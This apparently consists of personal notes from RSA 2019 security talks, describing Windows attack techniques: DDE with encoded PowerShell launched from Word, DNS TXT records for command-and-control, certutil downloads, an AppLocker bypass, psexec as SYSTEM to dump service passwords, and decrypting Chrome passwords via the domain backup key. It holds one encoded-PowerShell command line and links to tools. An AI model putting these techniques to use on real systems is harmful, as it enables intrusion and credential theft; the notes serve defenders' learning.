Académique Documents
Professionnel Documents
Culture Documents
Note: it’s crazy to me that MSWord.exe is able to launch PowerShell like this:
C:\Programs\Microsoft\Office\MSWord.exe\..\..\..\..\Windows\System32\WindowsPower
Shell\v1.0\powershell.exe -encodedCommand $encodedcommand
RSA Notes
• McAfee – “only five organizations that paid the WannaCry ransom got their files back”
• McAfee – RDP credentials are on sale on the dark web for $10
• **Economics of the attacker are driving ransomware, botnets, AD Fraud ($250,000 per
week!)
“The use of DDE with PowerShell allows an attacker to execute arbitrary code on a
victim’s system regardless whether macros are enabled.”
Learn how to do this here:
https://1337red.wordpress.com/using-the-dde-attack-with-powershell-empire/
RSA Notes
• If a client can query an external DNS server, they can use nslookup to get base64 data
from a DNS text file for C2 communication
• Using powershell to convert it from base64 to ps1
• Then using powershell -ec to run a base64 encoded string
• CVE 2018-8440 using MSIEXEC to bypass AppLocker (required downloading executable
via DNS)
• Paula used certutil to download 7zip (but she showed how WDATP blocks this)
• Only 2 out of the 200 companies Paula has worked with have disabled NTLMv2 and
use Kerberos exclusively
• Paula recommends enabling SMB signing
• Paula ran cmdshell as system psexec -I -s so that she could dump service passwords
(services.msc)
RSA Notes
• Paula demonstrated a tool called chromepass.exe from Nirsoft that reveals Chrome
Passwords
• She showed how getting a certificate from AD allows you to decrypt end-users chrome
passwords
• The master keys are encrypted by MSDCC2 and the master keys are stored in a file, ex:
“BK-Cquire” (this is the public key for the AD domain stored on the local file, which
encrypts the chrome passwords) and the private key is in Active Directory.
• All the tools she used are downloadable from cqu.re/sessionrsa2019
pw:CQUREAcademy#123!
• She warned that Sharepoint’s profile service (and AAD Connect Service Account) both
have the ‘MS Directory Replicate All’ and therefore they have enough permission to get
the private key for DSAPI from AD.
RSA Notes